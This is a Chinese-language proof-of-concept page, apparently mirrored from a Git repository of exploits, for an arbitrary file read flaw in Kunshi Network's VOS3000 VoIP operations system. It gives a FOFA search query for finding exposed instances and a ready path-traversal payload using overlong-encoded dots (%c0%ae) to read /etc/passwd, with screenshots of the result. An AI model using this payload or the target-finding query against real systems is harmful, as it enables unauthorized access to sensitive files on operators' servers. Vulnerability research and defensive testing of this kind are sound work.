admin/POC
1
0
Fork 0
mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-11-08 03:46:17 +00:00
Code Issues Packages Projects Releases Wiki Activity
POC/wpoc/昆石网络/昆石网络VOS3000任意文件读取漏洞.md

25 lines
1.2 KiB
Markdown
Raw Normal View History

first commit
2025-03-04 23:12:57 +08:00
# 昆石网络VOS3000任意文件读取漏洞
# 一、漏洞简介
昆石网络VOS3000是一款功能全面、性能稳定的VoIP运营支撑系统适用于各类 电信级 运营业务尤其适合中小规模VoIP运营业务的需求。无论是在云服务器还是物理机上它都能完美运行为运营商提供高效、稳定、可靠的电信级运营服务。昆石网络VOS3000任意文件读取攻击者可通过此漏洞获取敏感信息。
# 二、影响版本
+ 昆石网络VOS3000
# 三、资产测绘
+ fofa`<font style="color:rgb(199, 37, 78);">body="VOS3000, VoIP, VoIP运营支撑系统, 软交换"</font>`
+ 特征
![1717167745472-1ad070b4-b932-41cf-ba11-bdad2f18a712.png](./img/NU8GNq2UNNv4VWQF/1717167745472-1ad070b4-b932-41cf-ba11-bdad2f18a712-105863.png)
# 四、漏洞复现
```rust
/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
```
![1717167837710-837017ab-620b-46fe-aaec-fdf3664c4680.png](./img/NU8GNq2UNNv4VWQF/1717167837710-837017ab-620b-46fe-aaec-fdf3664c4680-357508.png)
> 更新: 2024-06-01 11:14:22
> 原文: <https://www.yuque.com/xiaokp7/ocvun2/qnkhfqg0258ep6b5>
Reference in New Issue Copy Permalink